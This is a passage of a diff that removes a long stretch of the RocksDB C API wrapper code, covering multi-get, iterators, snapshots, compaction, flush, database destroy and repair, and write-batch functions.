-      Slice(key, keylen), &tmp);
-  if (s.ok()) {
-    *vallen = tmp.size();
-    result = CopyString(tmp);
-  } else {
-    *vallen = 0;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-  }
-  return result;
-}
-
-void rocksdb_multi_get(
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options,
-    size_t num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes,
-    char** values_list, size_t* values_list_sizes,
-    char** errs) {
-  std::vector<Slice> keys(num_keys);
-  for (size_t i = 0; i < num_keys; i++) {
-    keys[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  std::vector<std::string> values(num_keys);
-  std::vector<Status> statuses = db->rep->MultiGet(options->rep, keys, &values);
-  for (size_t i = 0; i < num_keys; i++) {
-    if (statuses[i].ok()) {
-      values_list[i] = CopyString(values[i]);
-      values_list_sizes[i] = values[i].size();
-      errs[i] = nullptr;
-    } else {
-      values_list[i] = nullptr;
-      values_list_sizes[i] = 0;
-      if (!statuses[i].IsNotFound()) {
-        errs[i] = strdup(statuses[i].ToString().c_str());
-      } else {
-        errs[i] = nullptr;
-      }
-    }
-  }
-}
-
-void rocksdb_multi_get_cf(
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options,
-    const rocksdb_column_family_handle_t* const* column_families,
-    size_t num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes,
-    char** values_list, size_t* values_list_sizes,
-    char** errs) {
-  std::vector<Slice> keys(num_keys);
-  std::vector<ColumnFamilyHandle*> cfs(num_keys);
-  for (size_t i = 0; i < num_keys; i++) {
-    keys[i] = Slice(keys_list[i], keys_list_sizes[i]);
-    cfs[i] = column_families[i]->rep;
-  }
-  std::vector<std::string> values(num_keys);
-  std::vector<Status> statuses = db->rep->MultiGet(options->rep, cfs, keys, &values);
-  for (size_t i = 0; i < num_keys; i++) {
-    if (statuses[i].ok()) {
-      values_list[i] = CopyString(values[i]);
-      values_list_sizes[i] = values[i].size();
-      errs[i] = nullptr;
-    } else {
-      values_list[i] = nullptr;
-      values_list_sizes[i] = 0;
-      if (!statuses[i].IsNotFound()) {
-        errs[i] = strdup(statuses[i].ToString().c_str());
-      } else {
-        errs[i] = nullptr;
-      }
-    }
-  }
-}
-
-rocksdb_iterator_t* rocksdb_create_iterator(
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options) {
-  rocksdb_iterator_t* result = new rocksdb_iterator_t;
-  result->rep = db->rep->NewIterator(options->rep);
-  return result;
-}
-
-rocksdb_iterator_t* rocksdb_create_iterator_cf(
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options,
-    rocksdb_column_family_handle_t* column_family) {
-  rocksdb_iterator_t* result = new rocksdb_iterator_t;
-  result->rep = db->rep->NewIterator(options->rep, column_family->rep);
-  return result;
-}
-
-void rocksdb_create_iterators(
-    rocksdb_t *db,
-    rocksdb_readoptions_t* opts,
-    rocksdb_column_family_handle_t** column_families,
-    rocksdb_iterator_t** iterators,
-    size_t size,
-    char** errptr) {
-  std::vector<ColumnFamilyHandle*> column_families_vec;
-  for (size_t i = 0; i < size; i++) {
-    column_families_vec.push_back(column_families[i]->rep);
-  }
-
-  std::vector<Iterator*> res;
-  Status status = db->rep->NewIterators(opts->rep, column_families_vec, &res);
-  assert(res.size() == size);
-  if (SaveError(errptr, status)) {
-    return;
-  }
-
-  for (size_t i = 0; i < size; i++) {
-    iterators[i] = new rocksdb_iterator_t;
-    iterators[i]->rep = res[i];
-  }
-}
-
-const rocksdb_snapshot_t* rocksdb_create_snapshot(
-    rocksdb_t* db) {
-  rocksdb_snapshot_t* result = new rocksdb_snapshot_t;
-  result->rep = db->rep->GetSnapshot();
-  return result;
-}
-
-void rocksdb_release_snapshot(
-    rocksdb_t* db,
-    const rocksdb_snapshot_t* snapshot) {
-  db->rep->ReleaseSnapshot(snapshot->rep);
-  delete snapshot;
-}
-
-char* rocksdb_property_value(
-    rocksdb_t* db,
-    const char* propname) {
-  std::string tmp;
-  if (db->rep->GetProperty(Slice(propname), &tmp)) {
-    // We use strdup() since we expect human readable output.
-    return strdup(tmp.c_str());
-  } else {
-    return nullptr;
-  }
-}
-
-int rocksdb_property_int(
-    rocksdb_t* db,
-    const char* propname,
-    uint64_t *out_val) {
-  if (db->rep->GetIntProperty(Slice(propname), out_val)) {
-    return 0;
-  } else {
-    return -1;
-  }
-}
-
-char* rocksdb_property_value_cf(
-    rocksdb_t* db,
-    rocksdb_column_family_handle_t* column_family,
-    const char* propname) {
-  std::string tmp;
-  if (db->rep->GetProperty(column_family->rep, Slice(propname), &tmp)) {
-    // We use strdup() since we expect human readable output.
-    return strdup(tmp.c_str());
-  } else {
-    return nullptr;
-  }
-}
-
-void rocksdb_approximate_sizes(
-    rocksdb_t* db,
-    int num_ranges,
-    const char* const* range_start_key, const size_t* range_start_key_len,
-    const char* const* range_limit_key, const size_t* range_limit_key_len,
-    uint64_t* sizes) {
-  Range* ranges = new Range[num_ranges];
-  for (int i = 0; i < num_ranges; i++) {
-    ranges[i].start = Slice(range_start_key[i], range_start_key_len[i]);
-    ranges[i].limit = Slice(range_limit_key[i], range_limit_key_len[i]);
-  }
-  db->rep->GetApproximateSizes(ranges, num_ranges, sizes);
-  delete[] ranges;
-}
-
-void rocksdb_approximate_sizes_cf(
-    rocksdb_t* db,
-    rocksdb_column_family_handle_t* column_family,
-    int num_ranges,
-    const char* const* range_start_key, const size_t* range_start_key_len,
-    const char* const* range_limit_key, const size_t* range_limit_key_len,
-    uint64_t* sizes) {
-  Range* ranges = new Range[num_ranges];
-  for (int i = 0; i < num_ranges; i++) {
-    ranges[i].start = Slice(range_start_key[i], range_start_key_len[i]);
-    ranges[i].limit = Slice(range_limit_key[i], range_limit_key_len[i]);
-  }
-  db->rep->GetApproximateSizes(column_family->rep, ranges, num_ranges, sizes);
-  delete[] ranges;
-}
-
-void rocksdb_delete_file(
-    rocksdb_t* db,
-    const char* name) {
-  db->rep->DeleteFile(name);
-}
-
-const rocksdb_livefiles_t* rocksdb_livefiles(
-    rocksdb_t* db) {
-  rocksdb_livefiles_t* result = new rocksdb_livefiles_t;
-  db->rep->GetLiveFilesMetaData(&result->rep);
-  return result;
-}
-
-void rocksdb_compact_range(
-    rocksdb_t* db,
-    const char* start_key, size_t start_key_len,
-    const char* limit_key, size_t limit_key_len) {
-  Slice a, b;
-  db->rep->CompactRange(
-      CompactRangeOptions(),
-      // Pass nullptr Slice if corresponding "const char*" is nullptr
-      (start_key ? (a = Slice(start_key, start_key_len), &a) : nullptr),
-      (limit_key ? (b = Slice(limit_key, limit_key_len), &b) : nullptr));
-}
-
-void rocksdb_compact_range_cf(
-    rocksdb_t* db,
-    rocksdb_column_family_handle_t* column_family,
-    const char* start_key, size_t start_key_len,
-    const char* limit_key, size_t limit_key_len) {
-  Slice a, b;
-  db->rep->CompactRange(
-      CompactRangeOptions(), column_family->rep,
-      // Pass nullptr Slice if corresponding "const char*" is nullptr
-      (start_key ? (a = Slice(start_key, start_key_len), &a) : nullptr),
-      (limit_key ? (b = Slice(limit_key, limit_key_len), &b) : nullptr));
-}
-
-void rocksdb_compact_range_opt(rocksdb_t* db, rocksdb_compactoptions_t* opt,
-                               const char* start_key, size_t start_key_len,
-                               const char* limit_key, size_t limit_key_len) {
-  Slice a, b;
-  db->rep->CompactRange(
-      opt->rep,
-      // Pass nullptr Slice if corresponding "const char*" is nullptr
-      (start_key ? (a = Slice(start_key, start_key_len), &a) : nullptr),
-      (limit_key ? (b = Slice(limit_key, limit_key_len), &b) : nullptr));
-}
-
-void rocksdb_compact_range_cf_opt(rocksdb_t* db,
-                                  rocksdb_column_family_handle_t* column_family,
-                                  rocksdb_compactoptions_t* opt,
-                                  const char* start_key, size_t start_key_len,
-                                  const char* limit_key, size_t limit_key_len) {
-  Slice a, b;
-  db->rep->CompactRange(
-      opt->rep, column_family->rep,
-      // Pass nullptr Slice if corresponding "const char*" is nullptr
-      (start_key ? (a = Slice(start_key, start_key_len), &a) : nullptr),
-      (limit_key ? (b = Slice(limit_key, limit_key_len), &b) : nullptr));
-}
-
-void rocksdb_flush(
-    rocksdb_t* db,
-    const rocksdb_flushoptions_t* options,
-    char** errptr) {
-  SaveError(errptr, db->rep->Flush(options->rep));
-}
-
-void rocksdb_disable_file_deletions(
-    rocksdb_t* db,
-    char** errptr) {
-  SaveError(errptr, db->rep->DisableFileDeletions());
-}
-
-void rocksdb_enable_file_deletions(
-    rocksdb_t* db,
-    unsigned char force,
-    char** errptr) {
-  SaveError(errptr, db->rep->EnableFileDeletions(force));
-}
-
-void rocksdb_destroy_db(
-    const rocksdb_options_t* options,
-    const char* name,
-    char** errptr) {
-  SaveError(errptr, DestroyDB(name, options->rep));
-}
-
-void rocksdb_repair_db(
-    const rocksdb_options_t* options,
-    const char* name,
-    char** errptr) {
-  SaveError(errptr, RepairDB(name, options->rep));
-}
-
-void rocksdb_iter_destroy(rocksdb_iterator_t* iter) {
-  delete iter->rep;
-  delete iter;
-}
-
-unsigned char rocksdb_iter_valid(const rocksdb_iterator_t* iter) {
-  return iter->rep->Valid();
-}
-
-void rocksdb_iter_seek_to_first(rocksdb_iterator_t* iter) {
-  iter->rep->SeekToFirst();
-}
-
-void rocksdb_iter_seek_to_last(rocksdb_iterator_t* iter) {
-  iter->rep->SeekToLast();
-}
-
-void rocksdb_iter_seek(rocksdb_iterator_t* iter, const char* k, size_t klen) {
-  iter->rep->Seek(Slice(k, klen));
-}
-
-void rocksdb_iter_seek_for_prev(rocksdb_iterator_t* iter, const char* k,
-                                size_t klen) {
-  iter->rep->SeekForPrev(Slice(k, klen));
-}
-
-void rocksdb_iter_next(rocksdb_iterator_t* iter) {
-  iter->rep->Next();
-}
-
-void rocksdb_iter_prev(rocksdb_iterator_t* iter) {
-  iter->rep->Prev();
-}
-
-const char* rocksdb_iter_key(const rocksdb_iterator_t* iter, size_t* klen) {
-  Slice s = iter->rep->key();
-  *klen = s.size();
-  return s.data();
-}
-
-const char* rocksdb_iter_value(const rocksdb_iterator_t* iter, size_t* vlen) {
-  Slice s = iter->rep->value();
-  *vlen = s.size();
-  return s.data();
-}
-
-void rocksdb_iter_get_error(const rocksdb_iterator_t* iter, char** errptr) {
-  SaveError(errptr, iter->rep->status());
-}
-
-rocksdb_writebatch_t* rocksdb_writebatch_create() {
-  return new rocksdb_writebatch_t;
-}
-
-rocksdb_writebatch_t* rocksdb_writebatch_create_from(const char* rep,
-                                                     size_t size) {
-  rocksdb_writebatch_t* b = new rocksdb_writebatch_t;
-  b->rep = WriteBatch(std::string(rep, size));
-  return b;
-}
-
-void rocksdb_writebatch_destroy(rocksdb_writebatch_t* b) {
-  delete b;
-}
-
-void rocksdb_writebatch_clear(rocksdb_writebatch_t* b) {
-  b->rep.Clear();
-}
-
-int rocksdb_writebatch_count(rocksdb_writebatch_t* b) {
-  return b->rep.Count();
-}
-
-void rocksdb_writebatch_put(
-    rocksdb_writebatch_t* b,
-    const char* key, size_t klen,
-    const char* val, size_t vlen) {
-  b->rep.Put(Slice(key, klen), Slice(val, vlen));
-}
-
-void rocksdb_writebatch_put_cf(
-    rocksdb_writebatch_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen,
-    const char* val, size_t vlen) {
-  b->rep.Put(column_family->rep, Slice(key, klen), Slice(val, vlen));
-}
-
-void rocksdb_writebatch_putv(
-    rocksdb_writebatch_t* b,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  std::vector<Slice> value_slices(num_values);
-  for (int i = 0; i < num_values; i++) {
-    value_slices[i] = Slice(values_list[i], values_list_sizes[i]);
-  }
-  b->rep.Put(SliceParts(key_slices.data(), num_keys),
-             SliceParts(value_slices.data(), num_values));
-}
-
-void rocksdb_writebatch_putv_cf(
-    rocksdb_writebatch_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  std::vector<Slice> value_slices(num_values);
-  for (int i = 0; i < num_values; i++) {
-    value_slices[i] = Slice(values_list[i], values_list_sizes[i]);
-  }
-  b->rep.Put(column_family->rep, SliceParts(key_slices.data(), num_keys),
-             SliceParts(value_slices.data(), num_values));
-}
-
-void rocksdb_writebatch_merge(
-    rocksdb_writebatch_t* b,
-    const char* key, size_t klen,
-    const char* val, size_t vlen) {
-  b->rep.Merge(Slice(key, klen), Slice(val, vlen));
-}
-
-void rocksdb_writebatch_merge_cf(
-    rocksdb_writebatch_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen,
-    const char* val, size_t vlen) {
-  b->rep.Merge(column_family->rep, Slice(key, klen), Slice(val, vlen));
-}
-
-void rocksdb_writebatch_mergev(
-    rocksdb_writebatch_t* b,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  std::vector<Slice> value_slices(num_values);
-  for (int i = 0; i < num_values; i++) {
-    value_slices[i] = Slice(values_list[i], values_list_sizes[i]);
-  }
-  b->rep.Merge(SliceParts(key_slices.data(), num_keys),
-               SliceParts(value_slices.data(), num_values));
-}
-
-void rocksdb_writebatch_mergev_cf(
-    rocksdb_writebatch_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  std::vector<Slice> value_slices(num_values);
-  for (int i = 0; i < num_values; i++) {
-    value_slices[i] = Slice(values_list[i], values_list_sizes[i]);
-  }
-  b->rep.Merge(column_family->rep, SliceParts(key_slices.data(), num_keys),
-               SliceParts(value_slices.data(), num_values));
-}
-
-void rocksdb_writebatch_delete(
-    rocksdb_writebatch_t* b,
-    const char* key, size_t klen) {
-  b->rep.Delete(Slice(key, klen));
-}
-
-void rocksdb_writebatch_delete_cf(
-    rocksdb_writebatch_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen) {
-  b->rep.Delete(column_family->rep, Slice(key, klen));
-}
-
-void rocksdb_writebatch_deletev(
-    rocksdb_writebatch_t* b,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  b->rep.Delete(SliceParts(key_slices.data(), num_keys));
-}
-
-void rocksdb_writebatch_deletev_cf(
-    rocksdb_writebatch_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  b->rep.Delete(column_family->rep, SliceParts(key_slices.data(), num_keys));
-}
-
-void rocksdb_writebatch_delete_range(rocksdb_writebatch_t* b,
-                                     const char* start_key,
-                                     size_t start_key_len, const char* end_key,
-                                     size_t end_key_len) {
-  b->rep.DeleteRange(Slice(start_key, start_key_len),
-                     Slice(end_key, end_key_len));
-}
-
-void rocksdb_writebatch_delete_range_cf(
-    rocksdb_writebatch_t* b, rocksdb_column_family_handle_t* column_family,
-    const char* start_key, size_t start_key_len, const char* end_key,
-    size_t end_key_len) {
-  b->rep.DeleteRange(column_family->rep, Slice(start_key, start_key_len),
-                     Slice(end_key, end_key_len));
-}
-
-void rocksdb_writebatch_delete_rangev(rocksdb_writebatch_t* b, int num_keys,
-                                      const char* const* start_keys_list,
-                                      const size_t* start_keys_list_sizes,
-                                      const char* const* end_keys_list,
-                                      const size_t* end_keys_list_sizes) {
-  std::vector<Slice> start_key_slices(num_keys);
-  std::vector<Slice> end_key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    start_key_slices[i] = Slice(start_keys_list[i], start_keys_list_sizes[i]);
-    end_key_slices[i] = Slice(end_keys_list[i], end_keys_list_sizes[i]);
-  }
-  b->rep.DeleteRange(SliceParts(start_key_slices.data(), num_keys),
-                     SliceParts(end_key_slices.data(), num_keys));
-}
-
-void rocksdb_writebatch_delete_rangev_cf(
-    rocksdb_writebatch_t* b, rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* start_keys_list,
-    const size_t* start_keys_list_sizes, const char* const* end_keys_list,
-    const size_t* end_keys_list_sizes) {
-  std::vector<Slice> start_key_slices(num_keys);
-  std::vector<Slice> end_key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    start_key_slices[i] = Slice(start_keys_list[i], start_keys_list_sizes[i]);
-    end_key_slices[i] = Slice(end_keys_list[i], end_keys_list_sizes[i]);
-  }
-  b->rep.DeleteRange(column_family->rep,
-                     SliceParts(start_key_slices.data(), num_keys),
-                     SliceParts(end_key_slices.data(), num_keys));
-}
-
-void rocksdb_writebatch_put_log_data(
-    rocksdb_writebatch_t* b,
-    const char* blob, size_t len) {
-  b->rep.PutLogData(Slice(blob, len));
-}
-
-void rocksdb_writebatch_iterate(
-    rocksdb_writebatch_t* b,
-    void* state,
-    void (*put)(void*, const char* k, size_t klen, const char* v, size_t vlen),
-    void (*deleted)(void*, const char* k, size_t klen)) {
-  class H : public WriteBatch::Handler {
-   public:
-    void* state_;
-    void (*put_)(void*, const char* k, size_t klen, const char* v, size_t vlen);
-    void (*deleted_)(void*, const char* k, size_t klen);
-    virtual void Put(const Slice& key, const Slice& value) override {
-      (*put_)(state_, key.data(), key.size(), value.data(), value.size());
-    }
-    virtual void Delete(const Slice& key) override {
-      (*deleted_)(state_, key.data(), key.size());
-    }
-  };
-  H handler;
-  handler.state_ = state;
-  handler.put_ = put;
-  handler.deleted_ = deleted;
-  b->rep.Iterate(&handler);
-}
-
-const char* rocksdb_writebatch_data(rocksdb_writebatch_t* b, size_t* size) {
-  *size = b->rep.GetDataSize();
-  return b->rep.Data().c_str();
-}
-
-void rocksdb_writebatch_set_save_point(rocksdb_writebatch_t* b) {
-  b->rep.SetSavePoint();
-}
-
-void rocksdb_writebatch_rollback_to_save_point(rocksdb_writebatch_t* b,
-                                               char** errptr) {
-  SaveError(errptr, b->rep.RollbackToSavePoint());
-}
-
-void rocksdb_writebatch_pop_save_point(rocksdb_writebatch_t* b, char** errptr) {
-  SaveError(errptr, b->rep.PopSavePoint());
-}
-
-rocksdb_writebatch_wi_t* rocksdb_writebatch_wi_create(size_t reserved_bytes, unsigned char overwrite_key) {
-  rocksdb_writebatch_wi_t* b = new rocksdb_writebatch_wi_t;
-  b->rep = new WriteBatchWithIndex(BytewiseComparator(), reserved_bytes, overwrite_key);
-  return b;
-}
-
-void rocksdb_writebatch_wi_destroy(rocksdb_writebatch_wi_t* b) {
-  if (b->rep) {
-    delete b->rep;
-  }
-  delete b;
-}
-
-void rocksdb_writebatch_wi_clear(rocksdb_writebatch_wi_t* b) {
-  b->rep->Clear();
-}
-
-int rocksdb_writebatch_wi_count(rocksdb_writebatch_wi_t* b) {
-  return b->rep->GetWriteBatch()->Count();
-}
-
-void rocksdb_writebatch_wi_put(
-    rocksdb_writebatch_wi_t* b,
-    const char* key, size_t klen,
-    const char* val, size_t vlen) {
-  b->rep->Put(Slice(key, klen), Slice(val, vlen));
-}
-
-void rocksdb_writebatch_wi_put_cf(
-    rocksdb_writebatch_wi_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen,
-    const char* val, size_t vlen) {
-  b->rep->Put(column_family->rep, Slice(key, klen), Slice(val, vlen));
-}
-
-void rocksdb_writebatch_wi_putv(
-    rocksdb_writebatch_wi_t* b,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  std::vector<Slice> value_slices(num_values);
-  for (int i = 0; i < num_values; i++) {
-    value_slices[i] = Slice(values_list[i], values_list_sizes[i]);
-  }
-  b->rep->Put(SliceParts(key_slices.data(), num_keys),
-             SliceParts(value_slices.data(), num_values));
-}
-
-void rocksdb_writebatch_wi_putv_cf(
-    rocksdb_writebatch_wi_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  std::vector<Slice> value_slices(num_values);
-  for (int i = 0; i < num_values; i++) {
-    value_slices[i] = Slice(values_list[i], values_list_sizes[i]);
-  }
-  b->rep->Put(column_family->rep, SliceParts(key_slices.data(), num_keys),
-             SliceParts(value_slices.data(), num_values));
-}
-
-void rocksdb_writebatch_wi_merge(
-    rocksdb_writebatch_wi_t* b,
-    const char* key, size_t klen,
-    const char* val, size_t vlen) {
-  b->rep->Merge(Slice(key, klen), Slice(val, vlen));
-}
-
-void rocksdb_writebatch_wi_merge_cf(
-    rocksdb_writebatch_wi_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen,
-    const char* val, size_t vlen) {
-  b->rep->Merge(column_family->rep, Slice(key, klen), Slice(val, vlen));
-}
-
-void rocksdb_writebatch_wi_mergev(
-    rocksdb_writebatch_wi_t* b,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  std::vector<Slice> value_slices(num_values);
-  for (int i = 0; i < num_values; i++) {
-    value_slices[i] = Slice(values_list[i], values_list_sizes[i]);
-  }
-  b->rep->Merge(SliceParts(key_slices.data(), num_keys),
-               SliceParts(value_slices.data(), num_values));
-}
-
-void rocksdb_writebatch_wi_mergev_cf(
-    rocksdb_writebatch_wi_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  std::vector<Slice> value_slices(num_values);
-  for (int i = 0; i < num_values; i++) {
-    value_slices[i] = Slice(values_list[i], values_list_sizes[i]);
-  }
-  b->rep->Merge(column_family->rep, SliceParts(key_slices.data(), num_keys),
-               SliceParts(value_slices.data(), num_values));
-}
-
-void rocksdb_writebatch_wi_delete(
-    rocksdb_writebatch_wi_t* b,
-    const char* key, size_t klen) {
-  b->rep->Delete(Slice(key, klen));
-}
-
-void rocksdb_writebatch_wi_delete_cf(
-    rocksdb_writebatch_wi_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen) {
-  b->rep->Delete(column_family->rep, Slice(key, klen));
-}
-
-void rocksdb_writebatch_wi_deletev(
-    rocksdb_writebatch_wi_t* b,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  b->rep->Delete(SliceParts(key_slices.data(), num_keys));
-}
-
-void rocksdb_writebatch_wi_deletev_cf(
-    rocksdb_writebatch_wi_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  b->rep->Delete(column_family->rep, SliceParts(key_slices.data(), num_keys));
-}
-
-void rocksdb_writebatch_wi_delete_range(rocksdb_writebatch_wi_t* b,
-                                     const char* start_key,
-                                     size_t start_key_len, const char* end_key,
-                                     size_t end_key_len) {
-  b->rep->DeleteRange(Slice(start_key, start_key_len),
-                     Slice(end_key, end_key_len));
-}
-
-void rocksdb_writebatch_wi_delete_range_cf(
-    rocksdb_writebatch_wi_t* b, rocksdb_column_family_handle_t* column_family,
-    const char* start_key, size_t start_key_len, const char* end_key,
-    size_t end_key_len) {
-  b->rep->DeleteRange(column_family->rep, Slice(start_key, start_key_len),
-                     Slice(end_key, end_key_len));
-}
-
-void rocksdb_writebatch_wi_delete_rangev(rocksdb_writebatch_wi_t* b, int num_keys,
-                                      const char* const* start_keys_list,
-                                      const size_t* start_keys_list_sizes,
-                                      const char* const* end_keys_list,
-                                      const size_t* end_keys_list_sizes) {
-  std::vector<Slice> start_key_slices(num_keys);
-  std::vector<Slice> end_key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    start_key_slices[i] = Slice(start_keys_list[i], start_keys_list_sizes[i]);
-    end_key_slices[i] = Slice(end_keys_list[i], end_keys_list_sizes[i]);
-  }
-  b->rep->DeleteRange(SliceParts(start_key_slices.data(), num_keys),
-                     SliceParts(end_key_slices.data(), num_keys));
-}
-
-void rocksdb_writebatch_wi_delete_rangev_cf(
-    rocksdb_writebatch_wi_t* b, rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* start_keys_list,
-    const size_t* start_keys_list_sizes, const char* const* end_keys_list,
-    const size_t* end_keys_list_sizes) {
-  std::vector<Slice> start_key_slices(num_keys);
-  std::vector<Slice> end_key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    start_key_slices[i] = Slice(start_keys_list[i], start_keys_list_sizes[i]);
-    end_key_slices[i] = Slice(end_keys_list[i], end_keys_list_sizes[i]);
-  }
-  b->rep->DeleteRange(column_family->rep,
-                     SliceParts(start_key_slices.data(), num_keys),
-                     SliceParts(end_key_slices.data(), num_keys));
-}
-
-void rocksdb_writebatch_wi_put_log_data(
-    rocksdb_writebatch_wi_t* b,
-    const char* blob, size_t len) {
-  b->rep->PutLogData(Slice(blob, len));
-}
-
-void rocksdb_writebatch_wi_iterate(
-    rocksdb_writebatch_wi_t* b,
-    void* state,
-    void (*put)(void*, const char* k, size_t klen, const char* v, size_t vlen),
-    void (*deleted)(void*, const char* k, size_t klen)) {
-  class H : public WriteBatch::Handler {
-   public:
-    void* state_;
-    void (*put_)(void*, const char* k, size_t klen, const char* v, size_t vlen);
-    void (*deleted_)(void*, const char* k, size_t klen);
-    virtual void Put(const Slice& key, const Slice& value) override {
-      (*put_)(state_, key.data(), key.size(), value.data(), value.size());
-    }
-    virtual void Delete(const Slice& key) override {
-      (*deleted_)(state_, key.data(), key.size());
-    }
-  };
-  H handler;
-  handler.state_ = state;
-  handler.put_ = put;
-  handler.deleted_ = deleted;
-  b->rep->GetWriteBatch()->Iterate(&handler);
-}
-
-const char* rocksdb_writebatch_wi_data(rocksdb_writebatch_wi_t* b, size_t* size) {
-  WriteBatch* wb = b->rep->GetWriteBatch();
-  *size = wb->GetDataSize();
-  return wb->Data().c_str();
-}
-
-void rocksdb_writebatch_wi_set_save_point(rocksdb_writebatch_wi_t* b) {
-  b->rep->SetSavePoint();
-}
-
-void rocksdb_writebatch_wi_rollback_to_save_point(rocksdb_writebatch_wi_t* b,
-                                               char** errptr) {
-  SaveError(errptr, b->rep->RollbackToSavePoint());
-}
-
-rocksdb_iterator_t* rocksdb_writebatch_wi_create_iterator_with_base(
-    rocksdb_writebatch_wi_t* wbwi,
-    rocksdb_iterator_t* base_iterator) {
-  rocksdb_iterator_t* result = new rocksdb_iterator_t;
-  result->rep = wbwi->rep->NewIteratorWithBase(base_iterator->rep);
-  delete base_iterator;
-  return result;
-}
-
-rocksdb_iterator_t* rocksdb_writebatch_wi_create_iterator_with_base_cf(
-    rocksdb_writebatch_wi_t* wbwi,
-    rocksdb_iterator_t* base_iterator,
-    rocksdb_column_family_handle_t* column_family) {
-  rocksdb_iterator_t* result = new rocksdb_iterator_t;
-  result->rep = wbwi->rep->NewIteratorWithBase(column_family->rep, base_iterator->rep);
-  delete base_iterator;
-  return result;
-}
-
-char* rocksdb_writebatch_wi_get_from_batch(
-    rocksdb_writebatch_wi_t* wbwi,
-    const rocksdb_options_t* options,
-    const char* key, size_t keylen,
-    size_t* vallen,
-    char** errptr) {
-  char* result = nullptr;
-  std::string tmp;
-  Status s = wbwi->rep->GetFromBatch(options->rep, Slice(key, keylen), &tmp);
-  if (s.ok()) {
-    *vallen = tmp.size();
-    result = CopyString(tmp);
-  } else {
-    *vallen = 0;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-  }
-  return result;
-}
-
-char* rocksdb_writebatch_wi_get_from_batch_cf(
-    rocksdb_writebatch_wi_t* wbwi,
-    const rocksdb_options_t* options,
-    rocksdb_column_family_handle_t* column_family,
